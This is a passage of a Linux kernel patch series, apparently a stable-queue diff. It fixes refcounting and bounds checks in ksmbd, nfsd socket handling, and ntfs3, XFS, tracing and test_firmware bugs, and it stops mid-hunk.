+diff --git a/fs/ksmbd/oplock.c b/fs/ksmbd/oplock.c
+index c7466546e59be..cbfed03a1e5ce 100644
+--- a/fs/ksmbd/oplock.c
++++ b/fs/ksmbd/oplock.c
+@@ -157,13 +157,42 @@ static struct oplock_info *opinfo_get_list(struct ksmbd_inode *ci)
+ 	rcu_read_lock();
+ 	opinfo = list_first_or_null_rcu(&ci->m_op_list, struct oplock_info,
+ 					op_entry);
+-	if (opinfo && !atomic_inc_not_zero(&opinfo->refcount))
+-		opinfo = NULL;
++	if (opinfo) {
++		if (!atomic_inc_not_zero(&opinfo->refcount))
++			opinfo = NULL;
++		else {
++			atomic_inc(&opinfo->conn->r_count);
++			if (ksmbd_conn_releasing(opinfo->conn)) {
++				atomic_dec(&opinfo->conn->r_count);
++				atomic_dec(&opinfo->refcount);
++				opinfo = NULL;
++			}
++		}
++	}
++
+ 	rcu_read_unlock();
+ 
+ 	return opinfo;
+ }
+ 
++static void opinfo_conn_put(struct oplock_info *opinfo)
++{
++	struct ksmbd_conn *conn;
++
++	if (!opinfo)
++		return;
++
++	conn = opinfo->conn;
++	/*
++	 * Check the waitqueue to drop pending requests on
++	 * disconnection. waitqueue_active() is safe because
++	 * the condition uses an atomic operation.
++	 */
++	if (!atomic_dec_return(&conn->r_count) && waitqueue_active(&conn->r_count_q))
++		wake_up(&conn->r_count_q);
++	opinfo_put(opinfo);
++}
++
+ void opinfo_put(struct oplock_info *opinfo)
+ {
+ 	if (!atomic_dec_and_test(&opinfo->refcount))
+@@ -666,13 +695,6 @@ static void __smb2_oplock_break_noti(struct work_struct *wk)
+ 
+ out:
+ 	ksmbd_free_work_struct(work);
+-	/*
+-	 * Checking waitqueue to dropping pending requests on
+-	 * disconnection. waitqueue_active is safe because it
+-	 * uses atomic operation for condition.
+-	 */
+-	if (!atomic_dec_return(&conn->r_count) && waitqueue_active(&conn->r_count_q))
+-		wake_up(&conn->r_count_q);
+ }
+ 
+ /**
+@@ -706,7 +728,6 @@ static int smb2_oplock_break_noti(struct oplock_info *opinfo)
+ 	work->conn = conn;
+ 	work->sess = opinfo->sess;
+ 
+-	atomic_inc(&conn->r_count);
+ 	if (opinfo->op_state == OPLOCK_ACK_WAIT) {
+ 		INIT_WORK(&work->work, __smb2_oplock_break_noti);
+ 		ksmbd_queue_work(work);
+@@ -776,13 +797,6 @@ static void __smb2_lease_break_noti(struct work_struct *wk)
+ 
+ out:
+ 	ksmbd_free_work_struct(work);
+-	/*
+-	 * Checking waitqueue to dropping pending requests on
+-	 * disconnection. waitqueue_active is safe because it
+-	 * uses atomic operation for condition.
+-	 */
+-	if (!atomic_dec_return(&conn->r_count) && waitqueue_active(&conn->r_count_q))
+-		wake_up(&conn->r_count_q);
+ }
+ 
+ /**
+@@ -822,7 +836,6 @@ static int smb2_lease_break_noti(struct oplock_info *opinfo)
+ 	work->conn = conn;
+ 	work->sess = opinfo->sess;
+ 
+-	atomic_inc(&conn->r_count);
+ 	if (opinfo->op_state == OPLOCK_ACK_WAIT) {
+ 		list_for_each_safe(tmp, t, &opinfo->interim_list) {
+ 			struct ksmbd_work *in_work;
+@@ -1144,8 +1157,10 @@ int smb_grant_oplock(struct ksmbd_work *work, int req_op_level, u64 pid,
+ 	}
+ 	prev_opinfo = opinfo_get_list(ci);
+ 	if (!prev_opinfo ||
+-	    (prev_opinfo->level == SMB2_OPLOCK_LEVEL_NONE && lctx))
++	    (prev_opinfo->level == SMB2_OPLOCK_LEVEL_NONE && lctx)) {
++		opinfo_conn_put(prev_opinfo);
+ 		goto set_lev;
++	}
+ 	prev_op_has_lease = prev_opinfo->is_lease;
+ 	if (prev_op_has_lease)
+ 		prev_op_state = prev_opinfo->o_lease->state;
+@@ -1153,19 +1168,19 @@ int smb_grant_oplock(struct ksmbd_work *work, int req_op_level, u64 pid,
+ 	if (share_ret < 0 &&
+ 	    prev_opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
+ 		err = share_ret;
+-		opinfo_put(prev_opinfo);
++		opinfo_conn_put(prev_opinfo);
+ 		goto err_out;
+ 	}
+ 
+ 	if (prev_opinfo->level != SMB2_OPLOCK_LEVEL_BATCH &&
+ 	    prev_opinfo->level != SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
+-		opinfo_put(prev_opinfo);
++		opinfo_conn_put(prev_opinfo);
+ 		goto op_break_not_needed;
+ 	}
+ 
+ 	list_add(&work->interim_entry, &prev_opinfo->interim_list);
+ 	err = oplock_break(prev_opinfo, SMB2_OPLOCK_LEVEL_II);
+-	opinfo_put(prev_opinfo);
++	opinfo_conn_put(prev_opinfo);
+ 	if (err == -ENOENT)
+ 		goto set_lev;
+ 	/* Check all oplock was freed by close */
+@@ -1228,14 +1243,14 @@ static void smb_break_all_write_oplock(struct ksmbd_work *work,
+ 		return;
+ 	if (brk_opinfo->level != SMB2_OPLOCK_LEVEL_BATCH &&
+ 	    brk_opinfo->level != SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
+-		opinfo_put(brk_opinfo);
++		opinfo_conn_put(brk_opinfo);
+ 		return;
+ 	}
+ 
+ 	brk_opinfo->open_trunc = is_trunc;
+ 	list_add(&work->interim_entry, &brk_opinfo->interim_list);
+ 	oplock_break(brk_opinfo, SMB2_OPLOCK_LEVEL_II);
+-	opinfo_put(brk_opinfo);
++	opinfo_conn_put(brk_opinfo);
+ }
+ 
+ /**
+@@ -1263,6 +1278,13 @@ void smb_break_all_levII_oplock(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 	list_for_each_entry_rcu(brk_op, &ci->m_op_list, op_entry) {
+ 		if (!atomic_inc_not_zero(&brk_op->refcount))
+ 			continue;
++
++		atomic_inc(&brk_op->conn->r_count);
++		if (ksmbd_conn_releasing(brk_op->conn)) {
++			atomic_dec(&brk_op->conn->r_count);
++			continue;
++		}
++
+ 		rcu_read_unlock();
+ 		if (brk_op->is_lease && (brk_op->o_lease->state &
+ 		    (~(SMB2_LEASE_READ_CACHING_LE |
+@@ -1292,7 +1314,7 @@ void smb_break_all_levII_oplock(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 		brk_op->open_trunc = is_trunc;
+ 		oplock_break(brk_op, SMB2_OPLOCK_LEVEL_NONE);
+ next:
+-		opinfo_put(brk_op);
++		opinfo_conn_put(brk_op);
+ 		rcu_read_lock();
+ 	}
+ 	rcu_read_unlock();
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 7684b31035d93..01887570efe8a 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -326,13 +326,9 @@ int smb2_set_rsp_credits(struct ksmbd_work *work)
+ 	if (hdr->Command == SMB2_NEGOTIATE)
+ 		aux_max = 1;
+ 	else
+-		aux_max = conn->vals->max_credits - credit_charge;
++		aux_max = conn->vals->max_credits - conn->total_credits;
+ 	credits_granted = min_t(unsigned short, credits_requested, aux_max);
+ 
+-	if (conn->vals->max_credits - conn->total_credits < credits_granted)
+-		credits_granted = conn->vals->max_credits -
+-			conn->total_credits;
+-
+ 	conn->total_credits += credits_granted;
+ 	work->credits_granted += credits_granted;
+ 
+@@ -865,13 +861,14 @@ static void assemble_neg_contexts(struct ksmbd_conn *conn,
+ 
+ static __le32 decode_preauth_ctxt(struct ksmbd_conn *conn,
+ 				  struct smb2_preauth_neg_context *pneg_ctxt,
+-				  int len_of_ctxts)
++				  int ctxt_len)
+ {
+ 	/*
+ 	 * sizeof(smb2_preauth_neg_context) assumes SMB311_SALT_SIZE Salt,
+ 	 * which may not be present. Only check for used HashAlgorithms[1].
+ 	 */
+-	if (len_of_ctxts < MIN_PREAUTH_CTXT_DATA_LEN)
++	if (ctxt_len <
++	    sizeof(struct smb2_neg_context) + MIN_PREAUTH_CTXT_DATA_LEN)
+ 		return STATUS_INVALID_PARAMETER;
+ 
+ 	if (pneg_ctxt->HashAlgorithms != SMB2_PREAUTH_INTEGRITY_SHA512)
+@@ -883,15 +880,23 @@ static __le32 decode_preauth_ctxt(struct ksmbd_conn *conn,
+ 
+ static void decode_encrypt_ctxt(struct ksmbd_conn *conn,
+ 				struct smb2_encryption_neg_context *pneg_ctxt,
+-				int len_of_ctxts)
++				int ctxt_len)
+ {
+-	int cph_cnt = le16_to_cpu(pneg_ctxt->CipherCount);
+-	int i, cphs_size = cph_cnt * sizeof(__le16);
++	int cph_cnt;
++	int i, cphs_size;
++
++	if (sizeof(struct smb2_encryption_neg_context) > ctxt_len) {
++		pr_err("Invalid SMB2_ENCRYPTION_CAPABILITIES context size\n");
++		return;
++	}
+ 
+ 	conn->cipher_type = 0;
+ 
++	cph_cnt = le16_to_cpu(pneg_ctxt->CipherCount);
++	cphs_size = cph_cnt * sizeof(__le16);
++
+ 	if (sizeof(struct smb2_encryption_neg_context) + cphs_size >
+-	    len_of_ctxts) {
++	    ctxt_len) {
+ 		pr_err("Invalid cipher count(%d)\n", cph_cnt);
+ 		return;
+ 	}
+@@ -939,15 +944,22 @@ static void decode_compress_ctxt(struct ksmbd_conn *conn,
+ 
+ static void decode_sign_cap_ctxt(struct ksmbd_conn *conn,
+ 				 struct smb2_signing_capabilities *pneg_ctxt,
+-				 int len_of_ctxts)
++				 int ctxt_len)
+ {
+-	int sign_algo_cnt = le16_to_cpu(pneg_ctxt->SigningAlgorithmCount);
+-	int i, sign_alos_size = sign_algo_cnt * sizeof(__le16);
++	int sign_algo_cnt;
++	int i, sign_alos_size;
++
++	if (sizeof(struct smb2_signing_capabilities) > ctxt_len) {
++		pr_err("Invalid SMB2_SIGNING_CAPABILITIES context length\n");
++		return;
++	}
+ 
+ 	conn->signing_negotiated = false;
++	sign_algo_cnt = le16_to_cpu(pneg_ctxt->SigningAlgorithmCount);
++	sign_alos_size = sign_algo_cnt * sizeof(__le16);
+ 
+ 	if (sizeof(struct smb2_signing_capabilities) + sign_alos_size >
+-	    len_of_ctxts) {
++	    ctxt_len) {
+ 		pr_err("Invalid signing algorithm count(%d)\n", sign_algo_cnt);
+ 		return;
+ 	}
+@@ -985,18 +997,16 @@ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 	len_of_ctxts = len_of_smb - offset;
+ 
+ 	while (i++ < neg_ctxt_cnt) {
+-		int clen;
+-
+-		/* check that offset is not beyond end of SMB */
+-		if (len_of_ctxts == 0)
+-			break;
++		int clen, ctxt_len;
+ 
+ 		if (len_of_ctxts < sizeof(struct smb2_neg_context))
+ 			break;
+ 
+ 		pctx = (struct smb2_neg_context *)((char *)pctx + offset);
+ 		clen = le16_to_cpu(pctx->DataLength);
+-		if (clen + sizeof(struct smb2_neg_context) > len_of_ctxts)
++		ctxt_len = clen + sizeof(struct smb2_neg_context);
++
++		if (ctxt_len > len_of_ctxts)
+ 			break;
+ 
+ 		if (pctx->ContextType == SMB2_PREAUTH_INTEGRITY_CAPABILITIES) {
+@@ -1007,7 +1017,7 @@ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 
+ 			status = decode_preauth_ctxt(conn,
+ 						     (struct smb2_preauth_neg_context *)pctx,
+-						     len_of_ctxts);
++						     ctxt_len);
+ 			if (status != STATUS_SUCCESS)
+ 				break;
+ 		} else if (pctx->ContextType == SMB2_ENCRYPTION_CAPABILITIES) {
+@@ -1018,7 +1028,7 @@ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 
+ 			decode_encrypt_ctxt(conn,
+ 					    (struct smb2_encryption_neg_context *)pctx,
+-					    len_of_ctxts);
++					    ctxt_len);
+ 		} else if (pctx->ContextType == SMB2_COMPRESSION_CAPABILITIES) {
+ 			ksmbd_debug(SMB,
+ 				    "deassemble SMB2_COMPRESSION_CAPABILITIES context\n");
+@@ -1037,9 +1047,10 @@ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 		} else if (pctx->ContextType == SMB2_SIGNING_CAPABILITIES) {
+ 			ksmbd_debug(SMB,
+ 				    "deassemble SMB2_SIGNING_CAPABILITIES context\n");
++
+ 			decode_sign_cap_ctxt(conn,
+ 					     (struct smb2_signing_capabilities *)pctx,
+-					     len_of_ctxts);
++					     ctxt_len);
+ 		}
+ 
+ 		/* offsets must be 8 byte aligned */
+@@ -1073,16 +1084,16 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 		return rc;
+ 	}
+ 
+-	if (req->DialectCount == 0) {
+-		pr_err("malformed packet\n");
++	smb2_buf_len = get_rfc1002_len(work->request_buf);
++	smb2_neg_size = offsetof(struct smb2_negotiate_req, Dialects);
++	if (smb2_neg_size > smb2_buf_len) {
+ 		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+ 		rc = -EINVAL;
+ 		goto err_out;
+ 	}
+ 
+-	smb2_buf_len = get_rfc1002_len(work->request_buf);
+-	smb2_neg_size = offsetof(struct smb2_negotiate_req, Dialects);
+-	if (smb2_neg_size > smb2_buf_len) {
++	if (req->DialectCount == 0) {
++		pr_err("malformed packet\n");
+ 		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+ 		rc = -EINVAL;
+ 		goto err_out;
+@@ -4371,21 +4382,6 @@ static int get_file_basic_info(struct smb2_query_info_rsp *rsp,
+ 	return 0;
+ }
+ 
+-static unsigned long long get_allocation_size(struct inode *inode,
+-					      struct kstat *stat)
+-{
+-	unsigned long long alloc_size = 0;
+-
+-	if (!S_ISDIR(stat->mode)) {
+-		if ((inode->i_blocks << 9) <= stat->size)
+-			alloc_size = stat->size;
+-		else
+-			alloc_size = inode->i_blocks << 9;
+-	}
+-
+-	return alloc_size;
+-}
+-
+ static void get_file_standard_info(struct smb2_query_info_rsp *rsp,
+ 				   struct ksmbd_file *fp, void *rsp_org)
+ {
+@@ -4400,7 +4396,7 @@ static void get_file_standard_info(struct smb2_query_info_rsp *rsp,
+ 	sinfo = (struct smb2_file_standard_info *)rsp->Buffer;
+ 	delete_pending = ksmbd_inode_pending_delete(fp);
+ 
+-	sinfo->AllocationSize = cpu_to_le64(get_allocation_size(inode, &stat));
++	sinfo->AllocationSize = cpu_to_le64(inode->i_blocks << 9);
+ 	sinfo->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
+ 	sinfo->NumberOfLinks = cpu_to_le32(get_nlink(&stat) - delete_pending);
+ 	sinfo->DeletePending = delete_pending;
+@@ -4465,7 +4461,7 @@ static int get_file_all_info(struct ksmbd_work *work,
+ 	file_info->Attributes = fp->f_ci->m_fattr;
+ 	file_info->Pad1 = 0;
+ 	file_info->AllocationSize =
+-		cpu_to_le64(get_allocation_size(inode, &stat));
++		cpu_to_le64(inode->i_blocks << 9);
+ 	file_info->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
+ 	file_info->NumberOfLinks =
+ 			cpu_to_le32(get_nlink(&stat) - delete_pending);
+@@ -4654,7 +4650,7 @@ static int get_file_network_open_info(struct smb2_query_info_rsp *rsp,
+ 	file_info->ChangeTime = cpu_to_le64(time);
+ 	file_info->Attributes = fp->f_ci->m_fattr;
+ 	file_info->AllocationSize =
+-		cpu_to_le64(get_allocation_size(inode, &stat));
++		cpu_to_le64(inode->i_blocks << 9);
+ 	file_info->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
+ 	file_info->Reserved = cpu_to_le32(0);
+ 	rsp->OutputBufferLength =
+diff --git a/fs/nfsd/nfsctl.c b/fs/nfsd/nfsctl.c
+index dc74a947a440c..573de0d49e172 100644
+--- a/fs/nfsd/nfsctl.c
++++ b/fs/nfsd/nfsctl.c
+@@ -710,16 +710,11 @@ static ssize_t __write_ports_addfd(char *buf, struct net *net, const struct cred
+ 	if (err != 0 || fd < 0)
+ 		return -EINVAL;
+ 
+-	if (svc_alien_sock(net, fd)) {
+-		printk(KERN_ERR "%s: socket net is different to NFSd's one\n", __func__);
+-		return -EINVAL;
+-	}
+-
+ 	err = nfsd_create_serv(net);
+ 	if (err != 0)
+ 		return err;
+ 
+-	err = svc_addsock(nn->nfsd_serv, fd, buf, SIMPLE_TRANSACTION_LIMIT, cred);
++	err = svc_addsock(nn->nfsd_serv, net, fd, buf, SIMPLE_TRANSACTION_LIMIT, cred);
+ 
+ 	if (err >= 0 &&
+ 	    !nn->nfsd_serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index dc3ba13546dd6..155b34c4683c2 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -469,7 +469,15 @@ nfsd_setattr(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 
+ 	inode_lock(inode);
+ 	for (retries = 1;;) {
+-		host_err = __nfsd_setattr(dentry, iap);
++		struct iattr attrs;
++
++		/*
++		 * notify_change() can alter its iattr argument, making
++		 * @iap unsuitable for submission multiple times. Make a
++		 * copy for every loop iteration.
++		 */
++		attrs = *iap;
++		host_err = __nfsd_setattr(dentry, &attrs);
+ 		if (host_err != -EAGAIN || !retries--)
+ 			break;
+ 		if (!nfsd_wait_for_delegreturn(rqstp, inode))
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index 57988fedd1847..e52dfa5c7562c 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -98,6 +98,12 @@ static struct inode *ntfs_read_mft(struct inode *inode,
+ 	/* Record should contain $I30 root. */
+ 	is_dir = rec->flags & RECORD_FLAG_DIR;
+ 
++	/* MFT_REC_MFT is not a dir */
++	if (is_dir && ino == MFT_REC_MFT) {
++		err = -EINVAL;
++		goto out;
++	}
++
+ 	inode->i_generation = le16_to_cpu(rec->seq);
+ 
+ 	/* Enumerate all struct Attributes MFT. */
+diff --git a/fs/xfs/xfs_buf_item_recover.c b/fs/xfs/xfs_buf_item_recover.c
+index ffa94102094d9..43167f543afc3 100644
+--- a/fs/xfs/xfs_buf_item_recover.c
++++ b/fs/xfs/xfs_buf_item_recover.c
+@@ -943,6 +943,16 @@ xlog_recover_buf_commit_pass2(
+ 	if (lsn && lsn != -1 && XFS_LSN_CMP(lsn, current_lsn) >= 0) {
+ 		trace_xfs_log_recover_buf_skip(log, buf_f);
+ 		xlog_recover_validate_buf_type(mp, bp, buf_f, NULLCOMMITLSN);
++
++		/*
++		 * We're skipping replay of this buffer log item due to the log
++		 * item LSN being behind the ondisk buffer.  Verify the buffer
++		 * contents since we aren't going to run the write verifier.
++		 */
++		if (bp->b_ops) {
++			bp->b_ops->verify_read(bp);
++			error = bp->b_error;
++		}
+ 		goto out_release;
+ 	}
+ 
+diff --git a/include/linux/sunrpc/svcsock.h b/include/linux/sunrpc/svcsock.h
+index bcc555c7ae9c6..13aff355d5a13 100644
+--- a/include/linux/sunrpc/svcsock.h
++++ b/include/linux/sunrpc/svcsock.h
+@@ -59,10 +59,9 @@ int		svc_recv(struct svc_rqst *, long);
+ int		svc_send(struct svc_rqst *);
+ void		svc_drop(struct svc_rqst *);
+ void		svc_sock_update_bufs(struct svc_serv *serv);
+-bool		svc_alien_sock(struct net *net, int fd);
+-int		svc_addsock(struct svc_serv *serv, const int fd,
+-					char *name_return, const size_t len,
+-					const struct cred *cred);
++int		svc_addsock(struct svc_serv *serv, struct net *net,
++			    const int fd, char *name_return, const size_t len,
++			    const struct cred *cred);
+ void		svc_init_xprt_sock(void);
+ void		svc_cleanup_xprt_sock(void);
+ struct svc_xprt *svc_sock_create(struct svc_serv *serv, int prot);
+diff --git a/include/media/dvb_net.h b/include/media/dvb_net.h
+index 5e31d37f25fac..cc01dffcc9f35 100644
+--- a/include/media/dvb_net.h
++++ b/include/media/dvb_net.h
+@@ -41,6 +41,9 @@
+  * @exit:		flag to indicate when the device is being removed.
+  * @demux:		pointer to &struct dmx_demux.
+  * @ioctl_mutex:	protect access to this struct.
++ * @remove_mutex:	mutex that avoids a race condition between a callback
++ *			called when the hardware is disconnected and the
++ *			file_operations of dvb_net.
+  *
+  * Currently, the core supports up to %DVB_NET_DEVICES_MAX (10) network
+  * devices.
+@@ -53,6 +56,7 @@ struct dvb_net {
+ 	unsigned int exit:1;
+ 	struct dmx_demux *demux;
+ 	struct mutex ioctl_mutex;
++	struct mutex remove_mutex;
+ };
+ 
+ /**
+diff --git a/include/media/dvbdev.h b/include/media/dvbdev.h
+index ac60c9fcfe9a6..34b01ebf32828 100644
+--- a/include/media/dvbdev.h
++++ b/include/media/dvbdev.h
+@@ -189,6 +189,21 @@ struct dvb_device {
+ 	void *priv;
+ };
+ 
++/**
++ * struct dvbdevfops_node - fops nodes registered in dvbdevfops_list
++ *
++ * @fops:		Dynamically allocated fops for ->owner registration
++ * @type:		type of dvb_device
++ * @template:		dvb_device used for registration
++ * @list_head:		list_head for dvbdevfops_list
++ */
++struct dvbdevfops_node {
++	struct file_operations *fops;
++	enum dvb_device_type type;
++	const struct dvb_device *template;
++	struct list_head list_head;
++};
++
+ /**
+  * dvb_device_get - Increase dvb_device reference
+  *
+diff --git a/include/net/sock.h b/include/net/sock.h
+index beb1b747fb09d..f11b98bd0244c 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -333,6 +333,7 @@ struct sk_filter;
+   *	@sk_cgrp_data: cgroup data for this cgroup
+   *	@sk_memcg: this socket's memory cgroup association
+   *	@sk_write_pending: a write to stream socket waits to start
++  *	@sk_wait_pending: number of threads blocked on this socket
+   *	@sk_state_change: callback to indicate change in the state of the sock
+   *	@sk_data_ready: callback to indicate there is data to be processed
+   *	@sk_write_space: callback to indicate there is bf sending space available
+@@ -425,6 +426,7 @@ struct sock {
+ 	unsigned int		sk_napi_id;
+ #endif
+ 	int			sk_rcvbuf;
++	int			sk_wait_pending;
+ 
+ 	struct sk_filter __rcu	*sk_filter;
+ 	union {
+@@ -1170,6 +1172,7 @@ static inline void sock_rps_reset_rxhash(struct sock *sk)
+ 
+ #define sk_wait_event(__sk, __timeo, __condition, __wait)		\
+ 	({	int __rc;						\
++		__sk->sk_wait_pending++;				\
+ 		release_sock(__sk);					\
+ 		__rc = __condition;					\
+ 		if (!__rc) {						\
+@@ -1179,6 +1182,7 @@ static inline void sock_rps_reset_rxhash(struct sock *sk)
+ 		}							\
+ 		sched_annotate_sleep();					\
+ 		lock_sock(__sk);					\
++		__sk->sk_wait_pending--;				\
+ 		__rc = __condition;					\
+ 		__rc;							\
+ 	})
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 0744717f5caa7..5eedd476a38d7 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -632,6 +632,7 @@ void tcp_reset(struct sock *sk, struct sk_buff *skb);
+ void tcp_skb_mark_lost_uncond_verify(struct tcp_sock *tp, struct sk_buff *skb);
+ void tcp_fin(struct sock *sk);
+ void tcp_check_space(struct sock *sk);
++void tcp_sack_compress_send_ack(struct sock *sk);
+ 
+ /* tcp_timer.c */
+ void tcp_init_xmit_timers(struct sock *);
+diff --git a/io_uring/epoll.c b/io_uring/epoll.c
+index 9aa74d2c80bc4..89bff2068a190 100644
+--- a/io_uring/epoll.c
++++ b/io_uring/epoll.c
+@@ -25,10 +25,6 @@ int io_epoll_ctl_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ {
+ 	struct io_epoll *epoll = io_kiocb_to_cmd(req, struct io_epoll);
+ 
+-	pr_warn_once("%s: epoll_ctl support in io_uring is deprecated and will "
+-		     "be removed in a future Linux kernel version.\n",
+-		     current->comm);
+-
+ 	if (sqe->buf_index || sqe->splice_fd_in)
+ 		return -EINVAL;
+ 
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index 2b2120ed2460f..75244d9e2bf9a 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -4193,13 +4193,19 @@ static int __create_val_field(struct hist_trigger_data *hist_data,
+ 		goto out;
+ 	}
+ 
+-	/* Some types cannot be a value */
+-	if (hist_field->flags & (HIST_FIELD_FL_GRAPH | HIST_FIELD_FL_PERCENT |
+-				 HIST_FIELD_FL_BUCKET | HIST_FIELD_FL_LOG2 |
+-				 HIST_FIELD_FL_SYM | HIST_FIELD_FL_SYM_OFFSET |
+-				 HIST_FIELD_FL_SYSCALL | HIST_FIELD_FL_STACKTRACE)) {
+-		hist_err(file->tr, HIST_ERR_BAD_FIELD_MODIFIER, errpos(field_str));
+-		ret = -EINVAL;
++	/* Some modifiers are not allowed on values and variables */
++	if (hist_field->flags & HIST_FIELD_FL_VAR) {
++		/* Variable */
++		if (hist_field->flags & (HIST_FIELD_FL_GRAPH | HIST_FIELD_FL_PERCENT |
++					 HIST_FIELD_FL_BUCKET | HIST_FIELD_FL_LOG2))
++			goto err;
++	} else {
++		/* Value */
++		if (hist_field->flags & (HIST_FIELD_FL_GRAPH | HIST_FIELD_FL_PERCENT |
++					 HIST_FIELD_FL_BUCKET | HIST_FIELD_FL_LOG2 |
++					 HIST_FIELD_FL_SYM | HIST_FIELD_FL_SYM_OFFSET |
++					 HIST_FIELD_FL_SYSCALL | HIST_FIELD_FL_STACKTRACE))
++			goto err;
+ 	}
+ 
+ 	hist_data->fields[val_idx] = hist_field;
+@@ -4211,6 +4217,9 @@ static int __create_val_field(struct hist_trigger_data *hist_data,
+ 		ret = -EINVAL;
+  out:
+ 	return ret;
++ err:
++	hist_err(file->tr, HIST_ERR_BAD_FIELD_MODIFIER, errpos(field_str));
++	return -EINVAL;
+ }
+ 
+ static int create_val_field(struct hist_trigger_data *hist_data,
+diff --git a/kernel/trace/trace_osnoise.c b/kernel/trace/trace_osnoise.c
+index 689361097bb0c..26111b0ca1da3 100644
+--- a/kernel/trace/trace_osnoise.c
++++ b/kernel/trace/trace_osnoise.c
+@@ -1595,6 +1595,8 @@ static enum hrtimer_restart timerlat_irq(struct hrtimer *timer)
+ 			osnoise_stop_tracing();
+ 			notify_new_max_latency(diff);
+ 
++			wake_up_process(tlat->kthread);
++
+ 			return HRTIMER_NORESTART;
+ 		}
+ 	}
+diff --git a/kernel/trace/trace_probe.h b/kernel/trace/trace_probe.h
+index de38f1c037762..3d731aac94d49 100644
+--- a/kernel/trace/trace_probe.h
++++ b/kernel/trace/trace_probe.h
+@@ -302,7 +302,7 @@ trace_probe_primary_from_call(struct trace_event_call *call)
+ {
+ 	struct trace_probe_event *tpe = trace_probe_event_from_call(call);
+ 
+-	return list_first_entry(&tpe->probes, struct trace_probe, list);
++	return list_first_entry_or_null(&tpe->probes, struct trace_probe, list);
+ }
+ 
+ static inline struct list_head *trace_probe_probe_list(struct trace_probe *tp)
+diff --git a/lib/test_firmware.c b/lib/test_firmware.c
+index 1c5a2adb16ef5..7f165c517338a 100644
+--- a/lib/test_firmware.c
++++ b/lib/test_firmware.c
+@@ -44,6 +44,7 @@ struct test_batched_req {
+ 	bool sent;
+ 	const struct firmware *fw;
+ 	const char *name;
++	const char *fw_buf;
+ 	struct completion completion;
+ 	struct task_struct *task;
+ 	struct device *dev;
+@@ -174,8 +175,14 @@ static void __test_release_all_firmware(void)
+ 
+ 	for (i = 0; i < test_fw_config->num_requests; i++) {
+ 		req = &test_fw_config->reqs[i];
+-		if (req->fw)
++		if (req->fw) {
++			if (req->fw_buf) {
++				kfree_const(req->fw_buf);
++				req->fw_buf = NULL;
++			}
+ 			release_firmware(req->fw);
++			req->fw = NULL;
++		}
+ 	}
+ 
+ 	vfree(test_fw_config->reqs);
+@@ -651,6 +658,8 @@ static ssize_t trigger_request_store(struct device *dev,
+ 
+ 	mutex_lock(&test_fw_mutex);
+ 	release_firmware(test_firmware);
++	if (test_fw_config->reqs)
++		__test_release_all_firmware();
+ 	test_firmware = NULL;
+ 	rc = request_firmware(&test_firmware, name, dev);
+ 	if (rc) {
+@@ -751,6 +760,8 @@ static ssize_t trigger_async_request_store(struct device *dev,
+ 	mutex_lock(&test_fw_mutex);
+ 	release_firmware(test_firmware);
+ 	test_firmware = NULL;
++	if (test_fw_config->reqs)
++		__test_release_all_firmware();
+ 	rc = request_firmware_nowait(THIS_MODULE, 1, name, dev, GFP_KERNEL,
+ 				     NULL, trigger_async_request_cb);
+ 	if (rc) {
+@@ -793,6 +804,8 @@ static ssize_t trigger_custom_fallback_store(struct device *dev,
+ 
+ 	mutex_lock(&test_fw_mutex);
+ 	release_firmware(test_firmware);
++	if (test_fw_config->reqs)
++		__test_release_all_firmware();
+ 	test_firmware = NULL;
+ 	rc = request_firmware_nowait(THIS_MODULE, FW_ACTION_NOUEVENT, name,
+ 				     dev, GFP_KERNEL, NULL,
+@@ -855,6 +868,8 @@ static int test_fw_run_batch_request(void *data)
+ 						 test_fw_config->buf_size);
+ 		if (!req->fw)
+ 			kfree(test_buf);
++		else
++			req->fw_buf = test_buf;
+ 	} else {
+ 		req->rc = test_fw_config->req_firmware(&req->fw,
+ 						       req->name,
+@@ -894,6 +909,11 @@ static ssize_t trigger_batched_requests_store(struct device *dev,
+ 
+ 	mutex_lock(&test_fw_mutex);
+ 
++	if (test_fw_config->reqs) {
++		rc = -EBUSY;
++		goto out_bail;
++	}
++
+ 	test_fw_config->reqs =
+ 		vzalloc(array3_size(sizeof(struct test_batched_req),
+ 				    test_fw_config->num_requests, 2));
+@@ -910,6 +930,7 @@ static ssize_t trigger_batched_requests_store(struct device *dev,
+ 		req->fw = NULL;
+ 		req->idx = i;
+ 		req->name = test_fw_config->name;
++		req->fw_buf = NULL;
+ 		req->dev = dev;
+ 		init_completion(&req->completion);
+ 		req->task = kthread_run(test_fw_run_batch_request, req,
+@@ -992,6 +1013,11 @@ ssize_t trigger_batched_requests_async_store(struct device *dev,
+ 
+ 	mutex_lock(&test_fw_mutex);
+ 
++	if (test_fw_config->reqs) {
++		rc = -EBUSY;
